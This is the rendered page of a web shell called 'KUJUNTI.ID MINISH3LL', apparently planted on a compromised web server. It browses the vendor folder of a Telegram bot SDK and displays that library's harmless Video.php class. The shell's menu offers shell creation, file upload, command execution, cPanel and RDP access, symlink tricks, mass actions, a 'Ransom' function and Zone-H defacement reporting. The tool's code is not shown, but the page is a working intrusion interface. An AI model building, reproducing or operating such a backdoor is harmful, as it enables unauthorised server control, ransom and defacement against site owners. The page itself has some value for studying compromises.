KUJUNTI.ID MINISH3LL
Path : /var/www/html/phkaymedia/vendor/irazasyed/telegram-bot-sdk/src/Objects/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/phkaymedia/vendor/irazasyed/telegram-bot-sdk/src/Objects/Video.php


<?php

namespace Telegram\Bot\Objects;

/**
 * Class Video.
 *
 * @link https://core.telegram.org/bots/api#video
 *
 * @property string         $fileId         Unique identifier for this file.
 * @property string         $fileUniqueId   Unique identifier for this file, which is supposed to be the same over time and for different bots. Can't be used to download or reuse the file.
 * @property int            $width          Video width as defined by sender.
 * @property int            $height         Video height as defined by sender.
 * @property int            $duration       Duration of the video in seconds as defined by sender.
 * @property PhotoSize|null $thumb          (Optional). Video thumbnail.
 * @property string|null    $fileName       (Optional). Original filename as defined by sender
 * @property string|null    $mimeType       (Optional). Mime type of a file as defined by sender.
 * @property int|null       $fileSize       (Optional). File size.
 */
class Video extends BaseObject
{
    /**
     * {@inheritdoc}
     */
    public function relations()
    {
        return [
            'thumb' => PhotoSize::class,
        ];
    }
}

© KUJUNTI.ID